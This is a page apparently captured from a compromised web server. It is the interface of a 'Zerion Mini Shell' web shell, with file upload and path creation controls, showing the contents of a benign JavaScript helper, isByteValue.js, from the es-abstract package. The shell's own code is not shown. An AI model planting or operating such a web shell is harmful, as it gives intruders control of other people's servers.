%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/node_modules/es-abstract/helpers/
Upload File :
Create Path :
Current File : /var/www/html/node_modules/es-abstract/helpers/isByteValue.js

'use strict';

module.exports = function isByteValue(value) {
	return typeof value === 'number' && value >= 0 && value <= 255 && (value | 0) === value;
};

Zerion Mini Shell 1.0